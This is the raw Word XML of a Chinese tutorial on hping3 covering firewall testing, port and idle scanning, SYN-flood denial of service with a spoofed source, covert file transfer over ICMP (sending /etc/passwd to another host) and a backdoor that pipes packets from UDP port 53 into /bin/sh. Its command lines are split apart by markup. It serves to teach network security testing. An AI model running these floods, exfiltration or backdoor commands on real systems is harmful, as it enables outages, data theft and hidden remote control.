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C822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 xml:space="preserve">Hping3 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主要有以下典型功能应用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9468D0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E85D0B2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2"/>
      <w:bookmarkEnd w:id="0"/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防火墙测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA43466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使用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指定各种数据包字段，依次对防火墙进行详细测试。请参考：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http://0daysecurity.com/articles/hping3_examples.html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B1116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测试防火墙对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ICMP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包的反应、是否支持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traceroute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、是否开放某个端口、对防火墙进行拒绝服务攻击（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DoS attack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）。例如，以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LandAttack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方式测试目标防火墙（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Land Attack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是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B3F5B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hping3 -S -c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1000000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a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10.10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10.10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p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21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10.10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10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CA28AD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6B874B8A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3"/>
      <w:bookmarkEnd w:id="1"/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端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4069CD0B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5EBE5A8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也可以对目标端口进行扫描。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支持指定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TCP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各个标志位、长度等信息。以下示例可用于探测目标机的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80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端口是否开放：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D61C86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hping3 -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I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eth0 -S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10.1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p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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721106E3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其中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-I eth0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指定使用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eth0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端口，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-S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指定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TCP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包的标志位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，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-p 80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指定探测的目的端口。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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124213E0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支持非常丰富的端口探测方式，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nmap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拥有的扫描方式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几乎都支持（除开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connect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方式，因为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仅发送与接收包，不会维护连接，所以不支持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connect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方式探测）。而且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能够对发送的探测进行更加精细的控制，方便用户微调探测结果。当然，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的端口扫描性能及综合处理能力，无法与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Nmap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相比。一般使用它仅对少量主机的少量端口进行扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0130F3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24BF9313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4"/>
      <w:bookmarkEnd w:id="2"/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Idle扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A0D9A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扫描（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 Scanning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）是一种匿名扫描远程主机的方式，该方式也是有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的作者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Salvatore Sanfilippo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发明的，目前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扫描在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Nmap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中也有实现。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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3968B4A6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该扫描原理是：寻找一台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主机（该主机没有任何的网络流量，并且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IPID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是逐个增长的），攻击端主机先向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主机发送探测包，从回复包中获取其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IPID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。冒充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主机的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地址向远程主机的端口发送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包（此处假设为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lastRenderedPageBreak/>
        <w:t>SYN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包），此时如果远程主机的目的端口开放，那么会回复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SYN/ACK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，此时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主机收到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SYN/ACK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后回复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RST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包。然后攻击端主机再向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idle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主机发送探测包，获取其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IPID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。那么对比两次的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IPID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值，我们就可以判断远程主机是否回复了数据包，从而间接地推测其端口状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E706C5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9FB6B77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5"/>
      <w:bookmarkEnd w:id="3"/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拒绝服务攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D567B09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使用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可以很方便构建拒绝服务攻击。比如对目标机发起大量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连接，伪造源地址为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192.168.10.99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，并使用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1000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微秒的间隔发送各个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SYN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包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB0685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hping3 -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I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eth0 -a192.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168.10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99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-S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10.33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</w:t>
      </w:r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p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80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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00065B52">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
          <w:color w:val="E45649"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F5"/>
        </w:rPr>
        <w:t>i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u1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F61F12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其他攻击如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smurf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、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teardrop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、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land attack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等也很容易构建出来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B12A7AA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5B71275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6"/>
      <w:bookmarkEnd w:id="4"/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文件传输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4BC2FC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支持通过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TCP/UDP/ICMP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等包来进行文件传输。相当于借助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TCP/UDP/ICMP</w:t>
      </w:r>
      <w:proofErr w:type="gram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包建立</w:t>
      </w:r>
      <w:proofErr w:type="gram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隐秘隧道通讯。实现方式是开启监听端口，对检测到的签名（签名为用户指定的字符串）的内容进行相应的解析。在接收端开启服务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14840508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hping3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1.159--listen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signature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--safe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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27C1C253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监听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ICMP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包中的签名，根据签名解析出文件内容。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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F48A964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在发送端使用签名打包的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ICMP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包发送文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319746DB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hping3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1.108--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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icmp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?d</w:t>
      </w:r>
      <w:proofErr w:type="gram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--sign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signature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--file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/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13861E1F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将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/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etc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/passwd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密码文件通过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ICMP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包传给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192.168.10.44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主机。发送</w:t>
      </w:r>
      <w:proofErr w:type="gram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包大小</w:t>
      </w:r>
      <w:proofErr w:type="gram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100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字节（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-d 100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），发送签名为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signature(-sign signature)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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3E4795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F4CDB12" w14:textId="77777777" w:rsidR="00065B52" w:rsidRPr="00065B52" w:rsidRDefault="00065B52" w:rsidP="00065B5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065B5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木马功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D275F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如果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Hping3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能够在远程主机上启动，那么可以作为木马程序启动监听端口，并在建立连接后打开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shell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通信。与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netcat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的后门功能类似。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C1539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示例：本地打开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53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号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UDP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端口（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DNS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解析服务）监听来自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192.168.10.66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主机的包含签名为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signature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的数据包，并将收到的数据调用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/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spell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sh</w:t>
      </w:r>
      <w:proofErr w:type="spell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执行。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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A6D78A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在木马启动端：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA7C3F1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hping3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192.168.10.66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--listen signature --safe --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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udp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-p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53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| </w:t>
      </w:r>
      <w:r w:rsidRPr="00065B52">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
          <w:color w:val="50A14F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F5"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B14C339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lastRenderedPageBreak/>
        <w:t>在远程控制端：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46925745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echo ls &gt;test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.cmd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</w:p>
    <w:p w14:paraId="772ACBAD" w14:textId="77777777" w:rsidR="00065B52" w:rsidRPr="00065B52" w:rsidRDefault="00065B52" w:rsidP="00065B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hping3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192.168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.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10.44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-p53 -d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100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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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udp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--sign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>siganature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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--file</w:t>
      </w:r>
      <w:r w:rsidRPr="00065B52">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F5"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./test</w:t>
      </w:r>
      <w:r w:rsidRPr="00065B52">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="宋体" w:hAnsi="Source Code Pro" w:cs="宋体"/>
          <w:color w:val="986801"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F5"/>
        </w:rPr>
        <w:t>.cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD4B557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将包含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ls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命令的文件加上签名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signature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发送到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192.168.10.44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主机的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53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号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UDP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端口，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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包数据</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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长度为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100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字节。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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3DB06E" w14:textId="77777777" w:rsidR="00065B52" w:rsidRPr="00065B52" w:rsidRDefault="00065B52" w:rsidP="00065B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当然这里只是简单的演示程序，真实的场景，控制端可以利益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shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00065B52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2D374B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行很多的高级复杂的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA66664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2DB302E4" w14:textId="77777777" w:rsidR="00065B52" w:rsidRPr="00065B52" w:rsidRDefault="00065B52" w:rsidP="00065B5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5B5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30CCE3F" w14:textId="77777777" w:rsidR="00505542" w:rsidRPr="00065B52" w:rsidRDefault="00505542"/>
    <w:sectPr w:rsidR="00505542" w:rsidRPr="0006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2A07" w14:textId="77777777" w:rsidR="00515320" w:rsidRDefault="00515320" w:rsidP="00065B52">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5376CE05" w14:textId="77777777" w:rsidR="00515320" w:rsidRDefault="00515320" w:rsidP="0006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B5E2" w14:textId="77777777" w:rsidR="00515320" w:rsidRDefault="00515320" w:rsidP="00065B52">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4BE16B3B" w14:textId="77777777" w:rsidR="00515320" w:rsidRDefault="00515320" w:rsidP="00065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2"/>
    <w:rsid w:val="00065B52"/>
    <w:rsid w:val="000D6D9D"/>
    <w:rsid w:val="00505542"/>
    <w:rsid w:val="00515320"/>
    <w:rsid w:val="006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562C34-7345-4E41-8D3C-C0950DB8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5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B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5B52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65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5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5B5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5B5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65B52"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-selector-tag">
    <w:name w:val="hljs-selector-tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00065B52"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attr">
    <w:name w:val="hljs-attr"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00065B52"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-regexp">
    <w:name w:val="hljs-regexp"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00065B52"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-selector-class">
    <w:name w:val="hljs-selector-class"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0006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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-05T02:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-05T02:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>